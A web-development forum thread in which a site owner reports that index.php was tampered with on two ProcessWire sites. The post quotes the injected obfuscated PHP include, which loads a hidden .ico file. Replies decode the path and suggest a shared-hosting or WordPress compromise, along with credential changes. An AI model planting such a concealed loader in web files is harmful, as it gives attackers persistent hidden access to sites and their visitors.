Jump to content
buster808

Index.php changed and images deleted.

Recommended Posts

Hi,

Today both my live websites that are identical in build had there index.php changed to example below.
One of them also had lots of images deleted from asset/files deleted from folders.

Has anyone ever had an issue like this before? or any ideas of what this could be as I don't want to go through this again.

Thanks

<?php
/*dc5b4*/
 
@include "\057home\057xtra\143rea/\160ubli\143_htm\154/lee\163tint\163.co.\165k/wi\162e/mo\144ules\057Syst\145m/.d\1429f76\0664.ic\157";
 
/*dc5b4*/

 

Share this post


Link to post
Share on other sites

From what I can tell, some might have gained access to your server/account . I have seen this before with wordpress sites. Has anything with your server changed lately? Also, I would check with your host to check if this is not just effecting you. Just in the short term, I would change your ftp credentials.

  • Like 4

Share this post


Link to post
Share on other sites

That's quite strange. Running this through decoder suggests that this include is trying to load file from /wire/modules/System/.db9f7664.ico. Is this a path that exists on your site, and if so, what's in that file?

/wire/modules/System/ is a path where SystemUpdater and SystemNotifications live, but I'm not aware of anything that should create a file like that. Combined with files suddenly being removed and this file getting modified, it doesn't sound good.

The first thing to do would be to check the server, i.e. is it possible that someone has gained illegitimate access to it. Is this a shared host, a VPS, or something else entirely? Were both sites on the same host?

I'm not aware of any security issues with ProcessWire itself, but ProcessWire isn't immune to problems caused by someone gaining access to the server, directly or through another application (such as a WordPress installation – which has actually happened before).

  • Like 3
  • Thanks 1

Share this post


Link to post
Share on other sites

Hi,

db9f7664.ico  does not exist

I have changed ftp details and will send an email to host.

Both sites are on a shared host and does have Wordpress websites on there.

 

Share this post


Link to post
Share on other sites
2 minutes ago, buster808 said:

Both sites are on a shared host and does have Wordpress websites on there.

 

Since you do have wordpress installs on the server, it wouldnt hurt to log in and check/update any passwords, make sure wordpress is updated (could help with any vulnerabilites with bug fixes etc), make sure that all themes and plugins are up to date as well.

 

Share this post


Link to post
Share on other sites

There are a few things that came up in my mind right now.

First I thought it looked like a failed git/SVN merge of some kind but afterwards it looked liked a failed upload from FileZilla. At least they both look pretty similar somehow.

As you stated that there are more instances of other sites and CMSs on that hosting you might want to try to set up different users for different sites. I guess you are using a US hosting company such as DreamH*st, H*stgator or Blueh*st, *2, or another 3.99/month mass-hosting ... I had several similar issues with these companies in the past - but to their rescue - they offer different users on a account to separate installations/instances of different sites.

TL;DR: what @teppo and @louisstephens say seems to be the case... someone got somehow access to that hosting. Maybe even through a nifty trick in W*rdPress.

  • Like 3
  • Thanks 1

Share this post


Link to post
Share on other sites

I have been away for a couple of days and Filezilla was open and logged in with my laptop on sleep.

I need to be more carful

 

Share this post


Link to post
Share on other sites

That's far from the best and ideal solution to go on vacation but did you change something within the path that @teppo mentioned?

Even if so... the index.php is still somewhere else than that path.

It's either weird or a good moment to change and set up a better and more secure environment.

  • Like 1

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...